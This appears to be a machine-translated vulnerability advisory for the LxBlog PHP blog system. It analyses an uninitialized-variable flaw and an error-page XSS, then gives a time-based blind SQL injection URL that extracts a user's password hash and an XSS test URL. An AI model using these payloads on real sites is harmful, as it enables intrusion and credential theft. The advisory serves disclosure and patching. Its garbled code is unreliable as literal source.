LxBlog variable uninitialized Vulnerability

Affected Versions:
LxBlog

Program introduction:
Lxblog is a multi-user Blog system developed by PHPWind Based on the PHP + MySQL database platform architecture. It emphasizes the interaction between the entire site and individual users, powerful personal homepage system, independent second-level domain name system, flexible user template system, rich circle of friends and album functions.

Vulnerability Analysis:

Code Analysis snippet:
==================================== Code ======================== ============================
/User/tag. php
<? Php
! Function_exists (usermsg) & exit (Forbidden );
! In_array ($ type, $ item_type) & exit;
// $ Type and $ item_type are not initialized.
Require_once (R_P.mod/charset_mod.php );
Foreach ($ _ POST as $ key => $ value ){
${Utf8 _. $ key} = $ value;
$ {$ Key} = $ db_charset! = UTF-8? Convert_charset (UTF-8, $ db_charset, $ value): $ value;
}

If ($ job = add ){
...... // Omit Part of the Code
} Elseif ($ job = "modify "){
$ Tagnum = "{$ type} num ";
$ Touchtagdb = $ db-> get_one ("SELECT k. tags, I. uid FROM pw _ {$ type} k left join pw_items I ON I. itemid = k. itemid WHERE k. itemid = $ itemid ");
// $ Type import the query statement to operate the database
$ Touchtagdb [uid]! = $ Admin_uid & exit;
...... // Omit Part of the Code
==================================== Code ======================== ============================
In the first line of the file! Function_exists (usermsg) & exit (Forbidden); in this case, we cannot directly access this file, but we can use user_index.php to include this file for execution. See the specific code.

==================================== Code ======================== ============================
// User_index.php
<? Php
...... // Omit Part of the Code
Require_once (R_P.user/global. php );
Require_once (R_P.user/top. php );

If (! $ Action ){
...... // Omit Part of the Code
} Elseif ($ action & file_exists (R_P. "user/$ action. php ")){
$ Basename = "$ user_file? Action = $ action ";
Require_once (Pcv (R_P. "user/$ action. php "));
// You can call vulnerable files by submitting $ action = tag.
}
...... // Omit Part of the Code
==================================== Code ======================== ============================
We can see that this vulnerability has been triggered, but we still need to consider whether it will be affected by register_global. Fortunately, user_index.php contained the user/global. php file at the beginning,
==================================== Code ======================== ============================
// User/global. php
<?
...... // Omit Part of the Code
If (! In_array ($ action, array (blogdata, comment, itemcp, post, userinfo ))){
// Blogdata, comment, itemcp, post, userinfo, global, top
// The submitted action = tag, which is not in the above array, can trigger the following code to successfully bypass the effect of register_global
Foreach ($ _ POST as $ _ key =>$ _ value ){
! Ereg (^ \ _, $ _ key) & strlen ($ {$ _ key }) <1 & $ {$ _ key }=$ _ POST [$ _ key];
}
Foreach ($ _ GET as $ _ key => $ _ value ){
! Ereg (^ \ _, $ _ key) & strlen ($ {$ _ key }) <1 & $ {$ _ key }=$ _ GET [$ _ key];
}
}
...... // Omit Part of the Code
==================================== Code ======================== ============================
Through the above analysis, we can successfully control the values of $ type and $ item_type, but pay attention to the following two points:
The first place is to satisfy the requirements of in_array ($ type, $ item_type). We can directly assign $ type and $ item_type [] to the same variable.

Lxblog Database Error-tolerant code
==================================== Code ======================== ============================
Function DB_ERROR ($ msg ){
Global $ db_blogname, $ REQUEST_URI;
$ Sqlerror = mysql_error ();
$ Sqlerrno = mysql_errno ();
// Ob_end_clean ();
Echo "Echo "<table style = TABLE-LAYOUT: fixed; WORD-WRAP: break-word> <tr> <td> $ msg ";
Echo "<br> <B> The URL Is </B>: <br> http: // $ _ SERVER [HTTP_HOST] $ REQUEST_URI ";
Echo "<br> <B> MySQL Server Error </B>: <br> $ sqlerror ($ sqlerrno )";
Echo "<br> <B> You Can Get Help In </B>: <br> <a target = _ blank href = http://www.phpwind.net> <B> http://www.phpwind.net </B> </a> ";
Echo "</td> </tr> </table> ";
Exit;
}
==================================== Code ======================== ============================
The function directly returns the url that causes database errors to the client without filtering the output, resulting in an xss vulnerability,

 

Vulnerability exploitation:
SQL injection test:
==================================== Poc =================== ============================
// Determine whether the first ASCII value of a user whose uid is 1 is greater than 0
Http://blog.xxx.com/user_index.php? Action = tag & job = modify & type = blog k left join pw_user I ON 1 = 1 WHERE I. uid = 1 AND if (ASCII (SUBSTRING (password, 1, 1)> 0), sleep (10), 1) /* & item_type [] = blog k left join pw_user I ON 1 = 1 WHERE I. uid = 1 AND if (ASCII (SUBSTRING (password, 1, 1)> 0), sleep (10), 1 )/*
==================================== Poc =================== ============================
XSS test:
==================================== Poc =================== ============================
Http://www.lxblog.net/user_index.php? Action = tag & job = modify & type = [XSS] & item_type [] = [XSS]
==================================== Poc =================== ============================

Solution:
Vendor patch:
LxBlog
----------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.lxblog.net/